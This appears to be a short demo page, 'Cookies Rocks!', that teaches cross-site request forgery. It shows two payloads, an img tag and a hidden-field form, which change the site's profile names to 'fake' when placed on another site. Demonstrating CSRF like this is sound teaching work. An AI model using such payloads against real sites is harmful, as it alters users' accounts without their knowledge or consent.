Cookies Rocks!

Your profile

You don't have a profile yet

Update with GET

Update with POST

CSRF "attack"

CSRF with form GET

Use this on another site:

<img src="//cookies.rocks/update-profile.html?firstname=fake&lastname=fake">

CSRF with form POST

Use this on another site:

<form action="//cookies.rocks/update-profile.html"
      method="POST">
    <input type="hidden" name="firstname" value="fake">
    <input type="hidden" name="lastname" value="fake">
    <input type="submit" value="The button">
</form>